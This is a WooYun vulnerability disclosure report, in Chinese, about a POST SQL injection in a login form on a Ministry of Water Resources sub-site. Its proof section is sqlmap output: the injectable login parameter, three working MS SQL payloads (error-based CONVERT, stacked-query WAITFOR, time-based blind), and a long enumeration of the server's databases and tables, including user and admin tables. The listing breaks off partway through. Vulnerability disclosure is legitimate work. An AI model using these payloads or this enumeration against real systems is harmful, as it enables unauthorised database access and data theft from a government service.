漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0102043
漏洞标题:水利部某分站存在post注入导致数据库泄漏
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2015-03-18 15:59
修复时间:2015-05-02 17:58
公开时间:2015-05-02 17:58
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-18: 细节已通知厂商并且等待厂商处理中
2015-03-18: 厂商已经确认,细节仅向厂商公开
2015-03-28: 细节向核心白帽子及相关领域专家公开
2015-04-07: 细节向普通白帽子公开
2015-04-17: 细节向实习白帽子公开
2015-05-02: 细节向公众公开
简要描述:
SuperRookie RT
详细说明:
某处 post sql注入 证明就好
漏洞证明:
sqlmap identified the following injection points with a total of 293 HTTP(s) requests:
---
Place: POST
Parameter: UC_txtLoginName1
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: UC_txtPwd1=88952634&UC_txtLoginName1=88952634' AND 6261=CONVERT(INT,(SELECT CHAR(113)+CHAR(99)+CHAR(119)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6261=6261) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(101)+CHAR(112)+CHAR(111)+CHAR(113))) AND 'upad'='upad
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: UC_txtPwd1=88952634&UC_txtLoginName1=88952634'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: UC_txtPwd1=88952634&UC_txtLoginName1=88952634' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
Database: ReportServerTempDB
[13 tables]
+-----------------------------------------------------------+
| ChunkData |
| ChunkSegmentMapping |
| DBUpgradeHistory |
| ExecutionCache |
| PersistedStream |
| Segment |
| SegmentedChunk |
| SessionData |
| SessionLock |
| SnapshotData |
| TempCatalog |
| TempDataSets |
| TempDataSources |
+-----------------------------------------------------------+
Database: tempdb
[20 tables]
+-----------------------------------------------------------+
| #A3F1C302 |
| #A5C4FCDB |
| #A6CE2FAD |
| #A7C253E6 |
| #A7FCD48C |
| #A8B6781F |
| #A8F0F8C5 |
| #A9E51CFE |
| #AA176BEA |
| #AA9EC091 |
| #ABFFB45C |
| #ACF3D895 |
| #AEDC2107 |
| #B05799E7 |
| #B3A64CA0 |
| #B58E9512 |
| #B776DD84 |
| #B95F25F6 |
| #BA6858C8 |
| #BEA5B93E |
+-----------------------------------------------------------+
Database: SZYLZ_USERDB
[86 tables]
+-----------------------------------------------------------+
| App_AuthType |
| App_System |
| App_SystemAuth |
| App_SystemType |
| App_SystemUser |
| App_Token |
| App_User |
| App_UserType |
| Auth_USBKey_Info |
| Auth_USBKey_User |
| DepartmentView |
| En_EnterpriseUser |
| En_Wtusercd_Relation |
| G_ComparisonClass |
| JobView |
| LZ_AuthType |
| LZ_ConfigConstant |
| LZ_ConfigTable |
| LZ_DepPosUserView |
| LZ_FrameApplication |
| LZ_FrameApplication_view |
| LZ_FrameRight |
| LZ_FrameRight_App_View |
| LZ_LoginLogs |
| LZ_MISDepPos |
| LZ_MISDepPosUser |
| LZ_MISDepPosUserUnderline |
| LZ_MISDepPosUser_0604bak |
| LZ_MISDepPosUser_view |
| LZ_MISDepPos_view |
| LZ_MISDepUserLevel |
| LZ_MISDepUser_View |
| LZ_MISDep_View |
| LZ_MISDepartment |
| LZ_MISDepartmentRelation |
| LZ_MISDepartmentUser |
| LZ_MISDepartment_View |
| LZ_MISPosInfo |
| LZ_MISPosUser_View |
| LZ_MISSystemRole |
| LZ_MISSystemRoleDynamicUser |
| LZ_MISSystemRoleStaticUser |
| LZ_MISUser |
| LZ_MISUser0326bak |
| LZ_MISUserDeskTopType |
| LZ_MISUserIDClass_View |
| LZ_MISUser_0604bak |
| LZ_MISUser_0628bak |
| LZ_MisUserAddressBook |
| LZ_PageAuthInfo |
| LZ_RightPage |
| OrganizationUnitRelation_del |
| OrganizationUserRelationView |
| RT_ReportTemplate |
| RoleView |
| SM_OptLog |
| S_ChannelModule |
| S_Version |
| UnitView |
| UserRoleView |
| UserView |
| VIEW_LZ_MISDEPARTMENT |
| VIEW_LZ_MISUSER |
| View_UserRole |
| View_User_IdName |
| XK_DM_GETWMODE |
| XK_DM_GETWSOURCE |
| XK_DM_QSBD |
| XK_XKZXX |
| g_comparison |
| p_PosInfo |
| p_UserDeskTop |
| p_UserGroup |
| p_UserGrpRelation |
| p_UserUGrpRelation |
| r_DynamicRoleUser |
| r_StaticRoleUser |
| r_SystemRole |
| r_SystemRoleUser |
| s_CodePrefix |
| s_SystemCode |
| s_SystemLog |
| s_UserIP |
| view_LoginName_newelement |
| view_LoginName_newtrade |
| view_r_RpbookNO |
+-----------------------------------------------------------+
Database: SZYLZ_XXDB
[7 tables]
+-----------------------------------------------------------+
| Common_Attach |
| DBDIR |
| DBDOCUMENT |
| DBINFOMATION |
| DBINFOTYPE |
| DB_DirDoc_View |
| TMP_TempFile |
+-----------------------------------------------------------+
Database: SZYLZ_YWDB
[265 tables]
+-----------------------------------------------------------+
| ANTUNUM |
| ApplyExtend |
| BEIANLZDW |
| Bulletin |
| DIY_TEMPCOMMAND_TABLE |
| DistrictCollate |
| FORMDATA |
| FormAttach |
| GW_FZ_R |
| Gd_Aj |
| Gd_Archive |
| IssueSignUp |
| JGFUSER |
| LZ_BBSUserInfo |
| LZ_BoardAttach |
| LZ_ContentCoding |
| LZ_MainPageSubjectPara |
| LZ_PolicyCoding |
| LZ_PolicyContent |
| LZ_PolicyContentAttach |
| LZ_RuleContent |
| LZ_RuleContentAttach |
| LZ_TempFiles |
| LZ_V_PolicyContent |
| LZ_V_PolicyTitle |
| LZ_V_RuleContent |
| LZ_ValidCoding |
| MAPPCONTENT |
| MAPPFILE |
| MWFLENUMTABS |
| MWFLHDL |
| MWRKFLW |
| MWRKFLWDEF |
| MWRKFLWPRI |
| OAGROUP |
| OASVRADDR |
| OAUSERS |
| OptionContent |
| OptionType |
| P_RegUserRole |
| P_signup |
| RP_ReportBook |
| RP_Type |
| RT_ReportTemplate |
| RT_ReportTemplateBak |
| ReportBook_BeiAn |
| ST_ACT_LOG_DETAIL |
| ST_ACT_LOG_INFO |
| ST_HOLIDAY |
| ST_SRDOC |
| ST_SRDOC_FILE_TYPE |
| ST_SRDOC_SECRET_LEVEL |
| ST_SUSPEND |
| S_SurveyBase |
| S_SurveyComment |
| S_SurveyResult |
| S_SurveySelect |
| SignUpStat |
| TMP_TempFile |
| Table_WZY |
| TouSu |
| VIEW_P_SignUp |
| VIEW_SHENPIYJ_KUODAFW |
| View_HOMEPAGE_LZDW_NEW |
| View_LYNM |
| View_LYNM_ReportBook |
| View_LZDWJiChuXinXi |
| View_LZDWQuery |
| View_L_LunZhengDW_KDFW |
| View_LunZhengDWInfo |
| View_LunZhengDWShouQuan |
| View_LunZhengDW_EngageBook |
| View_LunZhengDW_JiaJISQ |
| View_LunZhengDW_KuoDaFW |
| View_LunZhengDW_YiJiSQ |
| View_ProvinceNM |
| View_RPBookNOUse |
| View_RPBookNOUse_New |
| View_RPBookNOUse_x |
| View_Report |
| View_ReportTJ |
| View_ReportTJ_Bak |
| View_ReportType |
| View_RpbookNO_UseCase |
| View_ShenPiResult |
| View_TrainStat |
| View_Z_Experts_Author |
| View_Z_Experts_IdName |
| View_l_ShenPiYJ_ZiZhiYX_History |
| View_l_ShenPiYJ_ZiZhiYX_History_last |
| View_r_RpbookManager |
| View_rpbook_IsGotoFiles |
| View_youxiaoRQ |
| View_z_Experts_IsEnter |
| View_z_Experts_IsEnter2013 |
| View_z_Experts_Relation_SU_User |
| WebPage |
| Wf_WorkList |
| XK_XKZXX |
| ZJ_AGradeBusinessStatus |
| ZJ_AGradeReportBook |
| ZJ_AGradeSumInfo |
| ZJ_AGradeTrainingStatics |
| ZJ_AuditBGrade |
| ZJ_AuditOrganInfo |
| ZJ_AuditStatics |
| ZJ_ExpertInfo |
| ZJ_ExpertRepBook |
| ZiZhiDW_ReportBook |
| ZjFormAttach |
| a_AttachFile |
| a_article |
| admin |
| backup_l_FaDingDaiBiao |
| backup_l_JiShuFuZe |
| backup_l_LunZhengDW |
| backup_l_ShenPiYJ |
| comd_list |
| comdlist |
| dtproperties |
| ft_FlowTask |
| g_BoardUser |
| g_comparison |
| gharchchgdata |
| jiaozhu |
| l_BroadenHistory |
| l_ChengGuo |
| l_ChengGuo_0127bak |
| l_ChengGuo_1 |
| l_ChengGuo_2 |
| l_ChengGuo_3 |
| l_ChuFa |
| l_ContinueHistory |
| l_DiaoXiao |
| l_FaDingDaiBiao |
| l_JiShuFuZe |
| l_JiShuRenYuan |
| l_JiShuSheBei |
| l_JiangLi |
| l_LunZhengDW |
| l_LunZhengDW0326bak |
| l_LunZhengDW_bak |
| l_NianJian |
| l_QualificationHistory |
| l_QualificationHistory_0102 |
| l_ShenPiYJ |
| l_ShenPiYJ$0114 |
| l_ShenPiYJ_JiaJiSQ |
| l_ShenPiYJ_KuoDaFW |
| l_ShenPiYJ_ZiZhiBG |
| l_ShenPiYJ_ZiZhiYX |
| l_ZhuXiao |
| l_ZiZhiZhengShu |
| l_lunzhengdw0104bak |
| l_lunzhengdw11052234bak |
| l_shenpiyj0114bak |
| lastnews |
| lunzhengdw140107bak |
| m_BoardData |
| m_EvectionData |
| m_MailBoard |
| m_MsgData |
| m_NewsData |
| m_UserMsg |
| m_message |
| m_smsLog |
| nr_ReportBook |
| p_AirLiner |
| p_BasicSala |
| p_Course |
| p_Device |
| p_DigitSign |
| p_EduBk |
| p_Eligible |
| p_Isue |
| p_MailAdjunct |
| p_MailInfo |
| p_MonthSala |
| p_NativeTelZip |
| p_PosChange |
| p_PosInfo |
| p_ShadowUserGroup |
| p_ShadowUserGrpRelation |
| p_SystemLink |
| p_SystemUser |
| p_THide |
| p_TaxType |
| p_TollCall |
| p_TrainBk |
| p_TrainService |
| p_UserFamily |
| p_UserGroup |
| p_UserGrpRelation |
| p_UserPicture |
| p_UserUGrpRelation |
| p_UserWarrant |
| p_WorkExperience |
| pagelimit |
| r_Censorship |
| r_ExpertBeiAnIdea |
| r_ExpertBeiAnIdeaAttach |
| r_ExpertIdea |
| r_ExpertIdeaAttach |
| r_Province |
| r_ReplaceSource |
| r_ReportBook |
| r_ReportBookAttach |
| r_ReportBook_qt |
| r_ReportType |
| r_Right |
| r_RightAccredit |
| r_RightContent |
| r_RightList |
| r_RightOutList |
| r_RoleUser |
| r_RpbookNO |
| r_Rpbook_GotoFiles |
| r_UserCensorshipLink |
| r_UserProvinceLink |
| r_reportbookbasecase |
| r_reportexpertapprove |
| r_reportgrade |
| r_reportsuggestion |
| ru_roleuser_view |
| s_BbsList |
| s_BoardList |
| s_CodePrefix |
| s_MenuItemData |
| s_MenuSet |
| s_OnLine |
| s_Parameter |
| s_SystemLog |
| s_ToolbarSet |
| s_TopChannel |
| s_UserIP |
| search |
| search2 |
| temptable |
| view_HomePage_BGS |
| view_HomePage_LZDW |
| view_HomePage_ZJKCX |
| view_LunZhengDW_ZZBG |
| view_lunzhengdwinfo2013 |
| view_lunzhengdwinfo2013_State |
| view_zhuanjia |
| wf_flow_form_view |
| wf_flowdata_view |
| wf_roleuser_view |
| wf_template_form_view |
| z_Dessertation |
| z_Dessertation20150106bak |
| z_DiaoXiao |
| z_Experience |
| z_Experience20150106bak |
| z_Experts |
| z_Experts20150106bak |
| z_ExpertsLevel |
| z_ExpertsLevel20150106bak |
| z_ExpertsManager |
| z_Experts_0628bak |
| z_ZhuXiao |
| z_honour |
| z_honour20150106bak |
| zhuanjia |
| zz |
+-----------------------------------------------------------+
Database: SZYLZ_PZDB
[63 tables]
+-----------------------------------------------------------+
| Con_CX_FuncCategory |
| Con_CX_FuncParameter |
| Con_CX_FuncTab |
| Con_CX_ImgLayerConfig |
| Con_CX_ImgLayerFreeSearch |
| Con_CX_ImgLayerInfo |
| Con_CX_ImgLayerScale |
| Con_CX_ParaKeySet |
| Con_CX_SearchTab |
| Con_CX_SearchType |
| Con_CX_SubFuncTab |
| Con_JG_OWChart |
| Con_JG_OWChartDataInfo |
| Con_JG_OWChartParaKey |
| Con_JG_OWChartParaKey$ |
| Con_JG_OWChartParameter |
| Con_JG_OWComplexChartDataChart |
| Con_JG_OWComplexChartDataContrast |
| Con_JG_OWComplexChartDataList |
| Con_JG_OWComplexChartEigen |
| Con_JG_OWComplexConnInfo |
| Con_JG_OWComplexGridChart |
| Con_JG_OWCorInfo |
| Con_JG_OWDataInfo |
| Con_JG_OWDataTab |
| Con_JG_OWFrame |
| Con_JG_OWImage |
| Con_JG_OWObjectReleInfo |
| Con_JG_OWReleInfo |
| Con_PT_FrameNavigation |
| Con_QX_DeptImgScale |
| FuncParameter_v |
| HP_AB_FRAME |
| HP_AB_KEYWORD |
| OLYMPIC_PIPE_Att |
| PopFunc |
| RTS_PZ_AlarmParameter |
| RTS_PZ_Class |
| RTS_PZ_PointLocation |
| RTS_PZ_RTS |
| ViewSearchItem |
| XT_PZ_AutoNo |
| XT_PZ_Category |
| XT_PZ_ConfigDataFlow |
| XT_PZ_DataFlow |
| XT_PZ_DataOperate |
| XT_PZ_DataRight |
| XT_PZ_DataRight_old |
| XT_PZ_DataSearch |
| XT_PZ_DataState |
| XT_PZ_FieldInfo |
| XT_PZ_ForeignRelations |
| XT_PZ_FormSets |
| XT_PZ_HistoryData |
| XT_PZ_InfoPath |
| XT_PZ_InstanceInfoPath |
| XT_PZ_MainForm |
| XT_PZ_OperatorType |
| XT_PZ_RightGroup |
| XT_PZ_SystemCode |
| XT_PZ_TableInfo |
| XT_PZ_Toolbar |
| XT_PZ_UserReport |
+-----------------------------------------------------------+
Database: SSTWMJS
[135 tables]
+-----------------------------------------------------------+
| MetricType |
| T_MetricType |
| T_MetricValue |
| T_ProvinceInfo |
| T_ValleyInfo |
| T_Valley_YearCheckReport |
| T_WS_EValuateFile |
| T_WS_EValuateInfo |
| T_WS_METRIC |
| T_WS_Qsk |
| T_WS_User_R |
| T_WaterSourceInfo |
| T_WaterSource_YearPlan |
| T_WaterSource_YearSummary |
| View_EditEValuateInfo_Valley |
| View_WS_EValuatePercent |
| View_checkEValuateInfo |
| View_checkEValuateInfo_Valley |
| fs_Collect_News |
| fs_Collect_Rule |
| fs_Collect_RuleApply |
| fs_Collect_Site |
| fs_Collect_SiteFolder |
| fs_Form_yntest |
| fs_News_URL |
| fs_Sys_Help |
| fs_User_URL |
| fs_User_URLClass |
| fs_ads |
| fs_ads_class |
| fs_ads_stat |
| fs_adstxt |
| fs_api_commentary |
| fs_api_faviate |
| fs_api_navi |
| fs_api_pop |
| fs_api_qmenu |
| fs_customform |
| fs_customform_item |
| fs_define_class |
| fs_define_data |
| fs_define_save |
| fs_friend_class |
| fs_friend_link |
| fs_friend_pram |
| fs_news |
| fs_news_Class |
| fs_news_Gen |
| fs_news_JS |
| fs_news_JSFile |
| fs_news_JST_Class |
| fs_news_JSTemplet |
| fs_news_bak |
| fs_news_page |
| fs_news_site |
| fs_news_special |
| fs_news_sub |
| fs_news_topline |
| fs_news_unNews |
| fs_news_vote |
| fs_old_news |
| fs_special_news |
| fs_stat_Info |
| fs_stat_class |
| fs_stat_content |
| fs_stat_param |
| fs_sys_City |
| fs_sys_FieldClass |
| fs_sys_FieldData |
| fs_sys_Label |
| fs_sys_Label0827bak |
| fs_sys_Label0903bak |
| fs_sys_LabelClass |
| fs_sys_LabelFree |
| fs_sys_LabelFree0903bak |
| fs_sys_LabelStyle |
| fs_sys_LabelStyle0827bak |
| fs_sys_PSF |
| fs_sys_PramUser |
| fs_sys_Pramother |
| fs_sys_Province |
| fs_sys_SiteTask |
| fs_sys_User |
| fs_sys_UserLevel |
| fs_sys_User_bak |
| fs_sys_admin |
| fs_sys_admingroup |
| fs_sys_channel |
| fs_sys_channelclass |
| fs_sys_channellabel |
| fs_sys_channellabelclass |
| fs_sys_channelspecial |
| fs_sys_channelstyle |
| fs_sys_channelstyleclass |
| fs_sys_channelvalue |
| fs_sys_logs |
| fs_sys_newsIndex |
| fs_sys_param |
| fs_sys_parmConstr |
| fs_sys_parmPrint |
| fs_sys_styleclass |
| fs_sys_userfields |
| fs_sys_userother |
| fs_user_Card |
| fs_user_Constr |
| fs_user_ConstrClass |
| fs_user_Discuss |
| fs_user_DiscussActive |
| fs_user_DiscussActiveMember |
| fs_user_DiscussClass |
| fs_user_DiscussContribute |
| fs_user_DiscussMember |
| fs_user_DiscussTopic |
| fs_user_Friend |
| fs_user_FriendClass |
| fs_user_Ghistory |
| fs_user_Group |
| fs_user_Guser |
| fs_user_MessFiles |
| fs_user_Message |
| fs_user_Photo |
| fs_user_Photoalbum |
| fs_user_PhotoalbumClass |
| fs_user_Requestinformation |
| fs_user_constrPay |
| fs_user_news |
| fs_user_note |
| fs_user_userlogs |
| fs_user_vote |
| fs_vote_Item |
| fs_vote_Steps |
| fs_vote_class |
| fs_vote_manage |
| fs_vote_param |
| fs_vote_title |
+-----------------------------------------------------------+
Database: msdb
[230 tables]
+-----------------------------------------------------------+
| DTA_input |
| DTA_output |
| DTA_progress |
| DTA_reports_column |
| DTA_reports_database |
| DTA_reports_index |
| DTA_reports_indexcolumn |
| DTA_reports_partitionfunction |
| DTA_reports_partitionscheme |
| DTA_reports_query |
| DTA_reports_querycolumn |
| DTA_reports_querydatabase |
| DTA_reports_queryindex |
| DTA_reports_querytable |
| DTA_reports_table |
| DTA_reports_tableview |
| DTA_tuninglog |
| MSdatatype_mappings |
| MSdbms |
| MSdbms_datatype |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfile |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary |
| log_shipping_secondary_databases |
| logmarkhistory |
| msdb_version |
| restorefile |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| sysalerts_performance_counters_view |
| syscachedcredentials |
| syscategories |
| syscollector_blobs_internal |
| syscollector_collection_items |
| syscollector_collection_items_internal |
| syscollector_collection_sets |
| syscollector_collection_sets_internal |
| syscollector_collector_types |
| syscollector_collector_types_internal |
| syscollector_config_store |
| syscollector_config_store_internal |
| syscollector_execution_log |
| syscollector_execution_log_full |
| syscollector_execution_log_internal |
| syscollector_execution_stats |
| syscollector_execution_stats_internal |
| syscollector_tsql_query_collector |
| sysdac_history_internal |
| sysdac_instances |
| sysdac_instances_internal |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtslog90 |
| sysjobactivity |
| sysjobhistory |
| sysjobs |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profile |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_log |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysmanagement_shared_registered_servers |
| sysmanagement_shared_registered_servers_internal |
| sysmanagement_shared_server_groups |
| sysmanagement_shared_server_groups_internal |
| sysnotifications |
| sysoperators |
| sysoriginatingservers |
| sysoriginatingservers_view |
| syspolicy_conditions |
| syspolicy_conditions_internal |
| syspolicy_configuration |
| syspolicy_configuration_internal |
| syspolicy_execution_internal |
| syspolicy_facet_events |
| syspolicy_management_facets |
| syspolicy_object_sets |
| syspolicy_object_sets_internal |
| syspolicy_policies |
| syspolicy_policies_internal |
| syspolicy_policy_categories |
| syspolicy_policy_categories_internal |
| syspolicy_policy_category_subscriptions |
| syspolicy_policy_category_subscriptions_internal |
| syspolicy_policy_execution_history |
| syspolicy_policy_execution_history_details |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_internal |
| syspolicy_system_health_state |
| syspolicy_system_health_state_internal |
| syspolicy_target_set_levels |
| syspolicy_target_set_levels_internal |
| syspolicy_target_sets |
| syspolicy_target_sets_internal |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysschedules |
| sysschedules_localserver_view |
| syssessions |
| sysssislog |
| sysssispackagefolders |
| sysssispackages |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers |
| systargetservers_view |
| systaskids |
| sysutility_mi_configuration |
| sysutility_mi_configuration_internal |
| sysutility_mi_cpu_stage_internal |
| sysutility_mi_dac_execution_statistics_internal |
| sysutility_mi_session_statistics_internal |
| sysutility_mi_smo_objects_to_collect_internal |
| sysutility_mi_smo_properties_to_collect_internal |
| sysutility_mi_smo_stage_internal |
| sysutility_mi_volumes_stage_internal |
| sysutility_ucp_aggregated_dac_health |
| sysutility_ucp_aggregated_dac_health_internal |
| sysutility_ucp_aggregated_mi_health |
| sysutility_ucp_aggregated_mi_health_internal |
| sysutility_ucp_computer_cpu_health |
| sysutility_ucp_computer_cpu_health_internal |
| sysutility_ucp_computer_cpu_utilizations |
| sysutility_ucp_computer_policies |
| sysutility_ucp_computers |
| sysutility_ucp_computers_stub |
| sysutility_ucp_configuration |
| sysutility_ucp_configuration_internal |
| sysutility_ucp_cpu_utilization_stub |
| sysutility_ucp_dac_cpu_utilizations |
| sysutility_ucp_dac_database_file_space_health |
| sysutility_ucp_dac_database_file_space_utilizations |
| sysutility_ucp_dac_file_space_health_internal |
| sysutility_ucp_dac_health |
| sysutility_ucp_dac_health_internal |
| sysutility_ucp_dac_policies |
| sysutility_ucp_dac_policy_type |
| sysutility_ucp_dac_volume_space_utilizations |
| sysutility_ucp_dacs_stub |
| sysutility_ucp_database_files |
| sysutility_ucp_databases |
| sysutility_ucp_databases_stub |
| sysutility_ucp_datafiles |
| sysutility_ucp_datafiles_stub |
| sysutility_ucp_deployed_dacs |
| sysutility_ucp_filegroups |
| sysutility_ucp_filegroups_stub |
| sysutility_ucp_filegroups_with_policy_violations_internal |
| sysutility_ucp_health_policies_internal |
| sysutility_ucp_instance_policies |
| sysutility_ucp_instance_policy_type |
| sysutility_ucp_instances |
| sysutility_ucp_logfiles |
| sysutility_ucp_logfiles_stub |
| sysutility_ucp_managed_instances |
| sysutility_ucp_managed_instances_internal |
| sysutility_ucp_mi_cpu_utilizations |
| sysutility_ucp_mi_database_file_space_utilizations |
| sysutility_ucp_mi_database_health |
| sysutility_ucp_mi_database_health_internal |
| sysutility_ucp_mi_file_space_health |
| sysutility_ucp_mi_file_space_health_internal |
| sysutility_ucp_mi_health |
| sysutility_ucp_mi_health_internal |
| sysutility_ucp_mi_volume_space_health |
| sysutility_ucp_mi_volume_space_health_internal |
| sysutility_ucp_mi_volume_space_utilizations |
| sysutility_ucp_policies |
| sysutility_ucp_policy_check_conditions |
| sysutility_ucp_policy_check_conditions_internal |
| sysutility_ucp_policy_configuration |
| sysutility_ucp_policy_target_conditions |
| sysutility_ucp_policy_target_conditions_internal |
| sysutility_ucp_policy_violations |
| sysutility_ucp_policy_violations_internal |
| sysutility_ucp_processing_state_internal |
| sysutility_ucp_smo_servers_stub |
| sysutility_ucp_snapshot_partitions_internal |
| sysutility_ucp_space_utilization_stub |
| sysutility_ucp_supported_object_types_internal |
| sysutility_ucp_utility_space_utilization |
| sysutility_ucp_volumes |
| sysutility_ucp_volumes_stub |
+-----------------------------------------------------------+
Database: ReportServer
[39 tables]
+-----------------------------------------------------------+
| ActiveSubscriptions |
| Batch |
| CachePolicy |
| Catalog |
| ChunkData |
| ChunkSegmentMapping |
| ConfigurationInfo |
| DBUpgradeHistory |
| DataSets |
| DataSource |
| Event |
| ExecutionLog |
| ExecutionLog2 |
| ExecutionLog3 |
| ExecutionLogStorage |
| ExtendedDataSets |
| ExtendedDataSources |
| History |
| Keys |
| ModelDrill |
| ModelItemPolicy |
| ModelPerspective |
| Notifications |
| Policies |
| PolicyUserRole |
| ReportSchedule |
| Roles |
| RunningJobs |
| Schedule |
| SecData |
| Segment |
| SegmentedChunk |
| ServerParametersInstance |
| ServerUpgradeHistory |
| SnapshotData |
| Subscriptions |
| SubscriptionsBeingDeleted |
| UpgradeInfo |
| Users |
+-----------------------------------------------------------+
Database: master
[410 tables]
+-----------------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.SEQUENCES |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.availability_databases_cluster |
| sys.availability_group_listener_ip_addresses |
| sys.availability_group_listeners |
| sys.availability_groups |
| sys.availability_groups_cluster |
| sys.availability_read_only_routing_lists |
| sys.availability_replicas |
| sys.backup_devices |
| sys.certificates |
| sys.change_tracking_databases |
| sys.change_tracking_tables |
| sys.check_constraints |
| sys.column_store_dictionaries |
| sys.column_store_segments |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.conversation_priorities |
| sys.credentials |
| sys.crypt_properties |
| sys.cryptographic_providers |
| sys.data_spaces |
| sys.database_audit_specification_details |
| sys.database_audit_specifications |
| sys.database_files |
| sys.database_filestream_options |
| sys.database_mirroring |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_audit_actions |
| sys.dm_audit_class_type_map |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_cdc_errors |
| sys.dm_cdc_log_scan_sessions |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_cryptographic_provider_properties |
| sys.dm_database_encryption_keys |
| sys.dm_db_file_space_usage |
| sys.dm_db_fts_index_physical_stats |
| sys.dm_db_index_usage_stats |
| sys.dm_db_log_space_usage |
| sys.dm_db_mirroring_auto_page_repair |
| sys.dm_db_mirroring_connections |
| sys.dm_db_mirroring_past_actions |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_persisted_sku_features |
| sys.dm_db_script_level |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_db_uncontained_entities |
| sys.dm_exec_background_job_queue |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_procedure_stats |
| sys.dm_exec_query_memory_grants |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_resource_semaphores |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_exec_trigger_stats |
| sys.dm_filestream_file_io_handles |
| sys.dm_filestream_file_io_requests |
| sys.dm_filestream_non_transacted_handles |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_fdhosts |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_outstanding_batches |
| sys.dm_fts_population_ranges |
| sys.dm_fts_semantic_similarity_population |
| sys.dm_hadr_auto_page_repair |
| sys.dm_hadr_availability_group_states |
